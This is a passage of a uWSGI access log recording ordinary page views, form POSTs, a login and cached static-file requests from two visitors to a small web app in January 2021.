0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 179 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2078/2640] 180.160.48.43 () {40 vars in 818 bytes} [Thu Jan 14 12:17:47 2021] GET /single/12/ => generated 9119 bytes in 12 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2079/2641] 180.160.48.43 () {40 vars in 816 bytes} [Thu Jan 14 12:17:51 2021] GET /all-0-0-0 => generated 13233 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2080/2642] 180.160.48.43 () {40 vars in 922 bytes} [Thu Jan 14 12:17:57 2021] GET /all-0-0-0 => generated 13254 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 661|app: -1|req: -1/2643] 180.160.48.43 () {40 vars in 899 bytes} [Thu Jan 14 12:17:57 2021] GET /static/img/t_photo/10_love.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 661|app: -1|req: -1/2644] 180.160.48.43 () {40 vars in 927 bytes} [Thu Jan 14 12:17:57 2021] GET /static/img/t_photo/13_%E6%B2%A1%E5%90%AC%E6%87%82.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 1) +[pid: 661|app: 0|req: 2081/2645] 180.160.48.43 () {40 vars in 924 bytes} [Thu Jan 14 12:17:59 2021] GET /single/12/ => generated 9140 bytes in 17 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2082/2646] 180.160.48.43 () {40 vars in 816 bytes} [Thu Jan 14 12:18:10 2021] GET /single/12 => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 179 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2083/2647] 180.160.48.43 () {40 vars in 818 bytes} [Thu Jan 14 12:18:10 2021] GET /single/12/ => generated 9119 bytes in 11 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2084/2648] 180.160.48.43 () {42 vars in 849 bytes} [Thu Jan 14 12:18:15 2021] GET /single/12/ => generated 9119 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: -1|req: -1/2649] 180.160.48.43 () {42 vars in 875 bytes} [Thu Jan 14 12:18:15 2021] GET /static/css/bootstrap-responsive.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2650] 180.160.48.43 () {42 vars in 850 bytes} [Thu Jan 14 12:18:15 2021] GET /static/js/jquery.easing.1.3.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2651] 180.160.48.43 () {42 vars in 836 bytes} [Thu Jan 14 12:18:15 2021] GET /static/js/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2652] 180.160.48.43 () {42 vars in 842 bytes} [Thu Jan 14 12:18:15 2021] GET /static/js/jquery.custom.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2653] 180.160.48.43 () {42 vars in 834 bytes} [Thu Jan 14 12:18:15 2021] GET /static/js/bootstrap.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2654] 180.160.48.43 () {42 vars in 853 bytes} [Thu Jan 14 12:18:15 2021] GET /static/css/bootstrap.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2655] 180.160.48.43 () {42 vars in 890 bytes} [Thu Jan 14 12:18:15 2021] GET /static/img/t_photo/wrong.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2656] 180.160.48.43 () {42 vars in 857 bytes} [Thu Jan 14 12:18:15 2021] GET /static/css/prettyPhoto.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2657] 180.160.48.43 () {42 vars in 878 bytes} [Thu Jan 14 12:18:15 2021] GET /static/img/dianzan.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2658] 180.160.48.43 () {42 vars in 861 bytes} [Thu Jan 14 12:18:15 2021] GET /static/css/custom-styles.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2659] 180.160.48.43 () {42 vars in 852 bytes} [Thu Jan 14 12:18:15 2021] GET /static/js/jquery.prettyPhoto.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2660] 180.160.48.43 () {42 vars in 848 bytes} [Thu Jan 14 12:18:15 2021] GET /static/js/jquery.quicksand.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2661] 180.160.48.43 () {42 vars in 882 bytes} [Thu Jan 14 12:18:16 2021] GET /static/img/page-bg-1.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2662] 180.160.48.43 () {42 vars in 888 bytes} [Thu Jan 14 12:18:16 2021] GET /static/img/back-top-btn.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: 0|req: 2085/2663] 180.160.48.43 () {40 vars in 817 bytes} [Thu Jan 14 12:18:18 2021] GET /all-0-0-0 => generated 13233 bytes in 20 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2086/2664] 180.160.48.43 () {40 vars in 817 bytes} [Thu Jan 14 12:18:23 2021] GET /single/10 => generated 0 bytes in 0 msecs (HTTP/1.1 301) 5 headers in 179 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2087/2665] 180.160.48.43 () {40 vars in 819 bytes} [Thu Jan 14 12:18:23 2021] GET /single/10/ => generated 9206 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: -1|req: -1/2666] 180.160.48.43 () {40 vars in 864 bytes} [Thu Jan 14 12:18:23 2021] GET /static/img/t_photo/10_love.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: 0|req: 2088/2667] 180.160.48.43 () {46 vars in 959 bytes} [Thu Jan 14 12:18:43 2021] POST /single/10/ => generated 0 bytes in 23 msecs (HTTP/1.1 302) 7 headers in 203 bytes (2 switches on core 0) +[pid: 661|app: 0|req: 2089/2668] 180.160.48.43 () {42 vars in 849 bytes} [Thu Jan 14 12:18:43 2021] GET /single/10 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 179 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2090/2669] 180.160.48.43 () {42 vars in 851 bytes} [Thu Jan 14 12:18:43 2021] GET /single/10/ => generated 9690 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: -1|req: -1/2670] 180.160.48.43 () {38 vars in 807 bytes} [Thu Jan 14 12:18:43 2021] GET /static/img/t_photo/hungry.png => generated 1713 bytes in 1 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 0) +[pid: 661|app: 0|req: 2091/2671] 180.160.48.43 () {40 vars in 817 bytes} [Thu Jan 14 12:18:47 2021] GET /all-0-0-0 => generated 13233 bytes in 20 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2092/2672] 180.160.48.43 () {40 vars in 817 bytes} [Thu Jan 14 12:18:49 2021] GET /single/12 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 179 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2093/2673] 180.160.48.43 () {40 vars in 819 bytes} [Thu Jan 14 12:18:49 2021] GET /single/12/ => generated 9119 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2094/2674] 180.160.48.43 () {48 vars in 1104 bytes} [Thu Jan 14 12:18:51 2021] POST /single/12/ => generated 0 bytes in 29 msecs (HTTP/1.1 302) 7 headers in 203 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2095/2675] 180.160.48.43 () {42 vars in 954 bytes} [Thu Jan 14 12:18:51 2021] GET /single/12 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 179 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2096/2676] 180.160.48.43 () {42 vars in 956 bytes} [Thu Jan 14 12:18:51 2021] GET /single/12/ => generated 9672 bytes in 11 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: -1|req: -1/2677] 180.160.48.43 () {38 vars in 843 bytes} [Thu Jan 14 12:18:52 2021] GET /static/img/t_photo/hungry.png => generated 1713 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 87 bytes (0 switches on core 1) +[pid: 661|app: 0|req: 2097/2678] 180.160.48.43 () {42 vars in 850 bytes} [Thu Jan 14 12:19:06 2021] GET /single/12/ => generated 9651 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 1) +[pid: 661|app: -1|req: -1/2679] 180.160.48.43 () {42 vars in 876 bytes} [Thu Jan 14 12:19:06 2021] GET /static/css/bootstrap-responsive.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2680] 180.160.48.43 () {42 vars in 853 bytes} [Thu Jan 14 12:19:06 2021] GET /static/js/jquery.prettyPhoto.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2681] 180.160.48.43 () {42 vars in 837 bytes} [Thu Jan 14 12:19:06 2021] GET /static/js/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2682] 180.160.48.43 () {42 vars in 854 bytes} [Thu Jan 14 12:19:06 2021] GET /static/css/bootstrap.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2683] 180.160.48.43 () {42 vars in 891 bytes} [Thu Jan 14 12:19:06 2021] GET /static/img/t_photo/wrong.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2684] 180.160.48.43 () {42 vars in 835 bytes} [Thu Jan 14 12:19:06 2021] GET /static/js/bootstrap.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2685] 180.160.48.43 () {42 vars in 893 bytes} [Thu Jan 14 12:19:06 2021] GET /static/img/t_photo/hungry.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2686] 180.160.48.43 () {42 vars in 851 bytes} [Thu Jan 14 12:19:06 2021] GET /static/js/jquery.easing.1.3.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2687] 180.160.48.43 () {42 vars in 862 bytes} [Thu Jan 14 12:19:06 2021] GET /static/css/custom-styles.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2688] 180.160.48.43 () {42 vars in 843 bytes} [Thu Jan 14 12:19:06 2021] GET /static/js/jquery.custom.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2689] 180.160.48.43 () {42 vars in 849 bytes} [Thu Jan 14 12:19:06 2021] GET /static/js/jquery.quicksand.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2690] 180.160.48.43 () {42 vars in 879 bytes} [Thu Jan 14 12:19:06 2021] GET /static/img/dianzan.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2691] 180.160.48.43 () {42 vars in 858 bytes} [Thu Jan 14 12:19:06 2021] GET /static/css/prettyPhoto.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2692] 180.160.48.43 () {42 vars in 883 bytes} [Thu Jan 14 12:19:06 2021] GET /static/img/page-bg-1.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2693] 180.160.48.43 () {42 vars in 889 bytes} [Thu Jan 14 12:19:06 2021] GET /static/img/back-top-btn.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: 0|req: 2098/2694] 180.160.48.43 () {46 vars in 959 bytes} [Thu Jan 14 12:19:32 2021] POST /single/12/ => generated 0 bytes in 19 msecs (HTTP/1.1 302) 7 headers in 203 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2099/2695] 180.160.48.43 () {42 vars in 849 bytes} [Thu Jan 14 12:19:32 2021] GET /single/12 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 179 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2100/2696] 180.160.48.43 () {42 vars in 851 bytes} [Thu Jan 14 12:19:32 2021] GET /single/12/ => generated 10144 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2101/2697] 180.160.48.43 () {48 vars in 1104 bytes} [Thu Jan 14 12:19:40 2021] POST /single/12/ => generated 0 bytes in 24 msecs (HTTP/1.1 302) 7 headers in 203 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2102/2698] 180.160.48.43 () {42 vars in 954 bytes} [Thu Jan 14 12:19:40 2021] GET /single/12 => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 179 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2103/2699] 180.160.48.43 () {42 vars in 956 bytes} [Thu Jan 14 12:19:40 2021] GET /single/12/ => generated 10713 bytes in 17 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2104/2700] 180.160.48.43 () {40 vars in 921 bytes} [Thu Jan 14 12:20:08 2021] GET /publish/ => generated 5234 bytes in 7 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2105/2701] 180.160.48.43 () {40 vars in 923 bytes} [Thu Jan 14 12:20:12 2021] GET /all-0-0-0 => generated 13254 bytes in 16 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 661|app: -1|req: -1/2702] 180.160.48.43 () {40 vars in 899 bytes} [Thu Jan 14 12:20:12 2021] GET /static/img/t_photo/10_love.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2703] 180.160.48.43 () {40 vars in 927 bytes} [Thu Jan 14 12:20:12 2021] GET /static/img/t_photo/13_%E6%B2%A1%E5%90%AC%E6%87%82.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: 0|req: 2106/2704] 180.160.48.43 () {40 vars in 920 bytes} [Thu Jan 14 12:20:43 2021] GET /publish/ => generated 5234 bytes in 5 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2107/2705] 180.160.48.43 () {42 vars in 851 bytes} [Thu Jan 14 12:21:40 2021] GET /single/12/ => generated 10692 bytes in 13 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 661|app: -1|req: -1/2706] 180.160.48.43 () {42 vars in 858 bytes} [Thu Jan 14 12:21:40 2021] GET /static/css/prettyPhoto.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2707] 180.160.48.43 () {42 vars in 876 bytes} [Thu Jan 14 12:21:40 2021] GET /static/css/bootstrap-responsive.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2708] 180.160.48.43 () {42 vars in 835 bytes} [Thu Jan 14 12:21:40 2021] GET /static/js/bootstrap.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2709] 180.160.48.43 () {42 vars in 854 bytes} [Thu Jan 14 12:21:40 2021] GET /static/css/bootstrap.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2710] 180.160.48.43 () {42 vars in 862 bytes} [Thu Jan 14 12:21:40 2021] GET /static/css/custom-styles.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2711] 180.160.48.43 () {42 vars in 843 bytes} [Thu Jan 14 12:21:40 2021] GET /static/js/jquery.custom.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2712] 180.160.48.43 () {42 vars in 851 bytes} [Thu Jan 14 12:21:40 2021] GET /static/js/jquery.easing.1.3.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2713] 180.160.48.43 () {42 vars in 853 bytes} [Thu Jan 14 12:21:40 2021] GET /static/js/jquery.prettyPhoto.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2714] 180.160.48.43 () {42 vars in 879 bytes} [Thu Jan 14 12:21:40 2021] GET /static/img/dianzan.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2715] 180.160.48.43 () {42 vars in 891 bytes} [Thu Jan 14 12:21:40 2021] GET /static/img/t_photo/wrong.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2716] 180.160.48.43 () {42 vars in 837 bytes} [Thu Jan 14 12:21:40 2021] GET /static/js/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2717] 180.160.48.43 () {42 vars in 893 bytes} [Thu Jan 14 12:21:40 2021] GET /static/img/t_photo/hungry.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2718] 180.160.48.43 () {42 vars in 849 bytes} [Thu Jan 14 12:21:40 2021] GET /static/js/jquery.quicksand.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2719] 180.160.48.43 () {42 vars in 883 bytes} [Thu Jan 14 12:21:40 2021] GET /static/img/page-bg-1.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2720] 180.160.48.43 () {42 vars in 889 bytes} [Thu Jan 14 12:21:40 2021] GET /static/img/back-top-btn.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: 0|req: 2108/2721] 180.160.48.43 () {40 vars in 817 bytes} [Thu Jan 14 12:21:43 2021] GET /all-0-0-0 => generated 13233 bytes in 14 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2109/2722] 180.160.48.43 () {42 vars in 848 bytes} [Thu Jan 14 12:21:47 2021] GET /all-0-0-0 => generated 13233 bytes in 15 msecs (HTTP/1.1 200) 7 headers in 350 bytes (1 switches on core 1) +[pid: 661|app: -1|req: -1/2723] 180.160.48.43 () {42 vars in 836 bytes} [Thu Jan 14 12:21:47 2021] GET /static/js/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2724] 180.160.48.43 () {42 vars in 861 bytes} [Thu Jan 14 12:21:47 2021] GET /static/css/custom-styles.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2725] 180.160.48.43 () {42 vars in 875 bytes} [Thu Jan 14 12:21:47 2021] GET /static/css/bootstrap-responsive.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2726] 180.160.48.43 () {42 vars in 848 bytes} [Thu Jan 14 12:21:47 2021] GET /static/js/jquery.quicksand.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2727] 180.160.48.43 () {42 vars in 892 bytes} [Thu Jan 14 12:21:47 2021] GET /static/img/t_photo/4_math.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2728] 180.160.48.43 () {42 vars in 850 bytes} [Thu Jan 14 12:21:47 2021] GET /static/js/jquery.easing.1.3.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2729] 180.160.48.43 () {42 vars in 853 bytes} [Thu Jan 14 12:21:47 2021] GET /static/css/bootstrap.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2730] 180.160.48.43 () {42 vars in 890 bytes} [Thu Jan 14 12:21:47 2021] GET /static/img/t_photo/wrong.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2731] 180.160.48.43 () {42 vars in 898 bytes} [Thu Jan 14 12:21:47 2021] GET /static/img/t_photo/2_u%E7%9B%98.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2732] 180.160.48.43 () {42 vars in 857 bytes} [Thu Jan 14 12:21:47 2021] GET /static/css/prettyPhoto.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2733] 180.160.48.43 () {42 vars in 894 bytes} [Thu Jan 14 12:21:47 2021] GET /static/img/t_photo/10_love.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2734] 180.160.48.43 () {42 vars in 922 bytes} [Thu Jan 14 12:21:47 2021] GET /static/img/t_photo/13_%E6%B2%A1%E5%90%AC%E6%87%82.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2735] 180.160.48.43 () {42 vars in 852 bytes} [Thu Jan 14 12:21:47 2021] GET /static/js/jquery.prettyPhoto.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2736] 180.160.48.43 () {42 vars in 842 bytes} [Thu Jan 14 12:21:47 2021] GET /static/js/jquery.custom.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2737] 180.160.48.43 () {42 vars in 834 bytes} [Thu Jan 14 12:21:47 2021] GET /static/js/bootstrap.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2738] 180.160.48.43 () {42 vars in 882 bytes} [Thu Jan 14 12:21:47 2021] GET /static/img/page-bg-1.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2739] 180.160.48.43 () {42 vars in 888 bytes} [Thu Jan 14 12:21:47 2021] GET /static/img/back-top-btn.png => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: 0|req: 2110/2740] 180.160.63.35 () {38 vars in 786 bytes} [Thu Jan 14 12:22:30 2021] GET /login/ => generated 6428 bytes in 2 msecs (HTTP/1.1 200) 7 headers in 349 bytes (1 switches on core 0) +[pid: 661|app: -1|req: -1/2741] 180.160.63.35 () {40 vars in 775 bytes} [Thu Jan 14 12:22:30 2021] GET /static/css/bootstrap.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2742] 180.160.63.35 () {40 vars in 797 bytes} [Thu Jan 14 12:22:30 2021] GET /static/css/bootstrap-responsive.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2743] 180.160.63.35 () {40 vars in 758 bytes} [Thu Jan 14 12:22:30 2021] GET /static/js/jquery.min.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2744] 180.160.63.35 () {40 vars in 779 bytes} [Thu Jan 14 12:22:30 2021] GET /static/css/prettyPhoto.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2745] 180.160.63.35 () {40 vars in 777 bytes} [Thu Jan 14 12:22:30 2021] GET /static/css/flexslider.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2746] 180.160.63.35 () {40 vars in 783 bytes} [Thu Jan 14 12:22:30 2021] GET /static/css/custom-styles.css => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2747] 180.160.63.35 () {40 vars in 756 bytes} [Thu Jan 14 12:22:30 2021] GET /static/js/bootstrap.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2748] 180.160.63.35 () {40 vars in 774 bytes} [Thu Jan 14 12:22:30 2021] GET /static/js/jquery.prettyPhoto.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2749] 180.160.63.35 () {40 vars in 772 bytes} [Thu Jan 14 12:22:30 2021] GET /static/js/jquery.flexslider.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2750] 180.160.63.35 () {40 vars in 764 bytes} [Thu Jan 14 12:22:30 2021] GET /static/js/jquery.custom.js => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: -1|req: -1/2751] 180.160.63.35 () {40 vars in 829 bytes} [Thu Jan 14 12:22:31 2021] GET /static/img/page-bg-1.jpg => generated 0 bytes in 0 msecs (HTTP/1.1 304) 0 headers in 29 bytes (0 switches on core 0) +[pid: 661|app: 0|req: 2111/2752] 180.160.63.35 () {48 vars in 919 bytes} [Thu Jan 14 12:22:42 2021] POST /login/ => generated 27 bytes in 19 msecs (HTTP/1.1 200) 7 headers in 324 bytes (1 switches on core 0) +[pid: 661|app: 0|req: 2112/2753] 180.160.63.35 () {40 vars in 876 bytes} [Thu Jan 14 12:22:42 2021] GET /home => generated 0 bytes in 1 msecs (HTTP/1.1 301) 5 headers in 174 bytes (1 switches on core 1) +[pid: 661|app: 0|req: 2113/2754] 180.160.63.35 () {40 vars in 878 bytes} [Thu Jan 14 12:22:42 2021] GET /home/ => generated 10083 bytes in 13 msecs (HTTP/1.1 200) 6 headers in 182 bytes (1 switches on core 1) +[pid: 661|app: -1|req: -1/2755] 180.160.63.35 () {38 vars in 811 bytes} [Thu Jan 14 12:22:43 2021] GET /static/img/t_photo/2_u%E7%9B%98.jpg => generated 14933 bytes in 0 msecs via sendfile() (HTTP/1.1 200) 2 headers in 88 bytes (0 switches on core 0) +[pid: 661|app: 0|req: 2114/2756] 180.160.63.35 () {40 vars in 889 bytes} [Thu Jan 14 12:22:51 2021] GET /single-an-5 => generated 0 